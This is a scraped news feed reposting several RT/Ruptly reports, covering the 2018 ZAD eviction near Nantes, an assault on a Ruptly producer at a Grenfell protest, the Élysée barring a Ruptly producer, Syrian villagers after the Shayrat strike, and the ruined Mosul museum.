Molotov cocktails and stun grenades flew through clouds of tear gas as 2,500 officers moved in to evict the illegal occupants of the ZAD anarchist commune in western France. Ruptly crew were caught up in the action, and tear gas.

RT’s Charlotte Dubenskij, reporting from the thick of the action, said at times it felt like the “sky was raining tear gas.” She said that her colleagues from Ruptly video agency were caught in clouds of the gas.

One policeman suffered an eye injury and was taken to a nearby hospital, the country’s Interior Ministry confirmed to Ouest France, adding that an investigation has been launched into the incident.

Law enforcement officials were mobilized for evictions in an area known as the ZAD. Up to several hundred activists have occupied the 1,650-hectare site, once reserved for a proposed airport near the western city of Nantes, calling it their “Zone a Defendre” (Zone to be Defended).

Police blocked off access to the local main road at 3.30am on Monday, ahead of the operation’s 6.00am start. They “conducted a law enforcement mission overnight on departmental route 281, where the illegal occupants had set up barricades and had set fire to them,” the Interior Ministry said in a statement.

“These expulsions are illegal,” one protester, known as Camille, told AFP. “It is unacceptable that the state is driving people out of their homes. We call on everyone to resist and support us, and to join local [protest] gatherings. We were in the framework of peaceful negotiation with the prefecture in search for collective solutions.”

But the ministry maintains that the authorities are acting upon “court decisions” designed “to proceed with the eviction of the most radical of the occupants. “This is [meant] to end the illegal occupation,” Interior Minister Gérard Collomb tweeted on Monday.

Pays-de-la-Loire regional prefect Nicole Klein announced later on Monday that “the goal was almost accomplished,” adding that the operation would continue “this afternoon and tomorrow in the same form: expulsions, demolitions, relocation.” She said that “the barricades will be cleared, [and] gendarmes will remain on site to prevent reconstruction.”

The operation aimed to dislodge “about a hundred” people and will be maintained for “as long as it is necessary” to prevent new occupants from moving in, Collomb said in an interview with Europe 1, adding that “about 40 buildings” must be dismantled.

Environmental activists and campaigners have protested against construction of the airport near  Nantes since 2008.
Supporters of the project argued it would boost economic development in the region, while opponents said it was too environmentally unfriendly, noting that there was another airport close by.

After years of debate, French Prime Minister Edouard Philippe announced in January this year that France would abandon the airport project. “This is the logical decision given the dead-end in which this project has found itself,” Philippe stated. He told activists squatting on the site to leave before March 30 or face expulsion.

“Our struggle does not end at the airport,” one of the activists told Le Parisien in January. “We want to recover these lands and take care of them so that they do not come to be used for traditional farming.“

Ruptly producer attacked & violently kicked at Grenfell fire protest in London https://briefnews.eu/ruptly-producer-attacked-violently-kicked-at-grenfell-fire-protest-in-london/ https://briefnews.eu/ruptly-producer-attacked-violently-kicked-at-grenfell-fire-protest-in-london/#respond Sat, 17 Jun 2017 01:24:09 +0000 http://briefnews.eu/ruptly-producer-attacked-violently-kicked-at-grenfell-fire-protest-in-london/ A producer of RT’s Ruptly video agency has come under a vicious attack while covering a heated rally outside the Kensington Town Hall following the Grenfell Tower fire that killed at least 30. He says protesters and police helped shield him from the violent group.

Hundreds of people gathered outside the town hall building chanting, “We want justice,” and “Bring them out.” The protesters demanded to know the true number of people who died in the fire.

Their demands also included a written commitment from the council that all those affected by the fire will be rehoused and relocated within the borough and an immediate release of funds to cover the loss and welfare of the victims.

“Some protesters got a bit heated and people were starting pushing around at the entrance of the town hall,” he told RT, adding that he saw “an AFP staff photographer getting attacked and pushed to a wall by the crowd” and attempted to get closer to the assaulted man when he was “suddenly attacked from behind.”

“Somebody tried to grab my camera from my hands and pull me down to the bottom. People started actually kicking on me and started kicking on my head and on my camera,” the producer said.

The producer managed to record the moment of the attack. In a video, one can see as someone kicks the producer’s camera as well as angry protesters rushing towards him.

However, other protesters quickly came to the journalist’s rescue and tried to “build a circle” around him as well as to “push [the attackers] back until one police officer moved in and took me to a safe spot inside the council” building.

“If it was not for the protesters, who tried to build a circle around me and the police officer, I might have suffered heavier injuries,” the producer admitted, adding that he escaped the beating lightly and even the camera seemed to be still working.

There have also been other reports about journalists being targeted by the angry crowd.

At least 30 people have so far been confirmed dead in the fire, with the figure still expected to rise. The tower block housed up to 600 residents, with dozens evacuated by firefighters and hospitalized, while an unknown number of others became stuck on upper floors as the only way out of the building, the stairwell, was filled with heavy smoke. A large portion of the tower became engulfed in flames in just minutes, with the newly-installed cladding cited as suspected cause of the rapid spread. Multiple reports cite a faulty fridge in a 44-year-old taxi driver’s flat as the origin of the fire. The man, originally from Ethiopia, reportedly alerted his neighbors.

The tower had a long history of fire safety concerns, with the residents directly predicting a disaster waiting to happen and accusing the Kensington and Chelsea Tenants Management Organisation (KCTMO) of ignoring the facts. Fire alarms did not reportedly go off on upper floors after the fire started, with many becoming aware of the blaze only after hearing screams outside. There were not sprinklers installed in the building, and the only way out was routinely hampered by old furniture and appliances.

In 2014, a leading British fire safety expert, Arnold Tarling, warned a meeting of the British Standards Institute that “this type of cladding fire” would soon take place in the UK and that it would lead to a large number of deaths. Complaints about basic fire safety violations have reportedly been ignored by the authorities for years, with reports suggesting responses such as “nothing could be done” were explained by fear “too many people” would have to move out of buildings breaching the standards.

Élysée Palace blocks RT's Ruptly video agency from Macron-May meeting https://briefnews.eu/elysee-palace-blocks-rts-ruptly-video-agency-from-macron-may-meeting/ https://briefnews.eu/elysee-palace-blocks-rts-ruptly-video-agency-from-macron-may-meeting/#respond Wed, 14 Jun 2017 12:43:27 +0000 http://briefnews.eu/elysee-palace-blocks-rts-ruptly-video-agency-from-macron-may-meeting/

Emmanuel Macron’s administration blocked a producer for RT’s video agency Ruptly from an event at the Élysée Palace on Tuesday. The incident appears to be the latest involving Russian media outlets and Macron, who seems to have a grudge against them.

Ugo Passuello came to the residence of the French president to cover Macron’s meeting with UK Prime Minister Theresa May. The palace’s press service released a statement ahead of the conference, saying that accessing it would only require a French press card, which Passuello had with him.

However, when he showed it to security he was barred from the event, allegedly over not having accreditation, he said.

“They saw the word ‘Ruptly’ on it. Several minutes later they told me Ruptly was not welcome at the Élysée Palace anymore and asked me to leave the place,” Passuello told RT.

Passuello said the palace security didn’t check his name against any list. Instead the guard called somebody on the phone and then simply rejected him.

“I am officially accredited by the Foreign Ministry,” he said. “This is purely political.”

Ruptly asked for clarification from the French president’s administration and has not immediately received it.

“Last time we asked Macron how he plans to work with foreign media. Voila!” commented RT’s Editor-in-Chief Margarita Simonyan.

The French president previously branded RT and the Russian news agency Sputnik “deceitful propaganda” and implied that people working for them are not “real journalists.”

“I have always had an exemplary relationship with foreign journalists, but they have to be real journalists,” Macron told RT France head Xenia Fedorova during a joint press conference with Russian President Vladimir Putin in Versailles. “All foreign journalists, including Russian journalists, had access to my campaign.”

The dismissive remark came in response for comments on his campaign’s obstruction of RT and Sputnik during the election track. RT journalists were barred from the candidate’s HQ without a proper explanation.

In March, Macron’s aide Mounir Mahjoubi accused RT and Sputnik of being the “first source of false information shared about our candidate.” Accusations of false reporting also came from Richard Ferrand, Macron’s En Marche! Party, back in February.

No example of the alleged misinformation was ever provided.

RT said it “adamantly” denied these unfounded allegations.

“It seems that it has become acceptable to level such serious charges at RT without presenting any evidence to substantiate them, as well as to apply this ‘fake news’ label to any reporting that one might simply find unfavorable,” RT’s Press Office said in response to Ferrand’s remarks.

Ruptly films Syrian village hit in US missile strike on Syrian airfield (VIDEO) https://briefnews.eu/ruptly-films-syrian-village-hit-in-us-missile-strike-on-syrian-airfield-video/ https://briefnews.eu/ruptly-films-syrian-village-hit-in-us-missile-strike-on-syrian-airfield-video/#respond Mon, 10 Apr 2017 01:03:46 +0000 http://briefnews.eu/ruptly-films-syrian-village-hit-in-us-missile-strike-on-syrian-airfield-video/ Residents of a village located near the Shayrat airfield in Homs had stray Tomahawks raining on them as US warships were firing at the base in response to the alleged chemical attack in Idlib. The locals told RT’s Ruptly agency of the horrors they experienced.

Villagers were the majority of victims of the US strike on the Shayrat Airbase on April 6, portrayed as retaliation against the Bashar Assad government, according to the governor of Homs Talal al-Barazi. A total of 14 people including nine innocent civilians were killed in the US missile attack.

A total of 59 Tomahawk cruise missiles were launched from US Navy ships in the Eastern Mediterranean, but only 23 of them reached their target, the Russian Defense Ministry has revealed. Some of the stray missiles apparently hit villages in the surrounding area.

Ruptly’s crew has talked to the wife of a soldier who was killed in the attack and also to local villagers who showed the aftermath of the American attack.

Ganea al-Ahmed, wife of Senior-Lieutenant Firas Hammoud who died in the attack, said her husband was ordered to the base shortly before the tragedy occurred.

“When they brought the coffin, I couldn’t stop crying as it is a shame to die at such an age,” Ganea said.

“This is horrible,” Ganea went on. “A mother is raising a son… Then suddenly the US… launches a strike on an airfield, and innocent people, no matter who, be it a general or senior lieutenant Firas, they hit us to kill all of us. And they call it a fight against terrorism.”

There were many people who had to leave their homes on Thursday night like her ill-fated husband, Ganea said.

“That night, the people of Shayrat left their homes and went far away, as they were scared that the village would be attacked. They only took clothes for their children,” she said.

“I am glad that within hours – or the next day – planes started to take off from Shayrat Airbase, and the operations began. The bulldozers started to work.”

Meanwhile, the villagers are mourning the loss of their loved ones and neighbors.

“Let God lay their souls to rest. There aren’t words to describe what happened,” Ganea said, almost crying.

Resident Assad Al-Khodr said that rockets landed only 40 meters away from his house. They left craters, seen on the video, damaged an electricity cable and caused a power cut.

“We were terrified. And the windows were shattered,” he said.

Another local man has described the attack as “a shameless aggression,” that spread panic and fear.

“This shameless aggression… caused panic among the children and civilians and inflicted huge damage to this village and to the surrounding villages,” he said, adding that the strike shattered windows and broke the facades of some buildings.

“One of their missiles landed between the houses in our village,” he said.

According to another eyewitness of the attack, “the station, the airport and the airbase restored their operations on the same day. This is a huge challenge to America and their allies.”

360° Mosul: Ruptly films destroyed museum while mortar rounds fall outside (EXCLUSIVE VIDEO) https://briefnews.eu/360-mosul-ruptly-films-destroyed-museum-while-mortar-rounds-fall-outside-exclusive-video/ https://briefnews.eu/360-mosul-ruptly-films-destroyed-museum-while-mortar-rounds-fall-outside-exclusive-video/#respond Tue, 14 Mar 2017 10:27:29 +0000 http://briefnews.eu/360-mosul-ruptly-films-destroyed-museum-while-mortar-rounds-fall-outside-exclusive-video/

RT’s Ruptly video news agency was filming a 360 video from the destroyed antiquities museum in Mosul, recently retaken from Islamic State, when the footage was interrupted by mortar shelling outside. Check out what happened in the exclusive video filmed Monday.

It’s dark in the museum, and people keep stepping on what sounds like the shards of glass. The antiquities museum in the Iraqi city of Mosul lies in ruins, with ash blanketing exhibition halls. The Mosul Museum was the second-largest museum in Iraq. However, what the video shows are empty and charred ruins, with rubble all over the place.

The Iraqi forces retook the building from Islamic State (IS, formerly ISIS/ISIL) a week ago, but the museum is still in the heart of a war zone, and the video confirms that: a blast rocks the building, with outgoing artillery rounds heard from inside the museum.

Most of the precious artifacts have been reported destroyed or missing from the museum, following two-and-a-half years at the hands of the terrorists.

In 2014, IS captured the museum, and declared that its artifacts breach the rules of Sharia law, and must be destroyed.

On February 26, 2015, the day after IS burnt books from Mosul libraries, the jihadists issued a video, which showed the destruction of the museum artifacts.

IS has been intentionally destroying historical sites all in Iraq and Syria for the past few years: among the latest atrocities was the destruction of the ancient Palmyra monuments and artifacts in Syria.

The operation to retake the western part of Mosul from IS was started in mid-February.

Fierce fighting and US-led coalition’s airstrikes have led to significant damage in the city, also displacing tens of thousands of people. Western Mosul was home for over 750,000 civilians before the assault, according to the UN estimates.
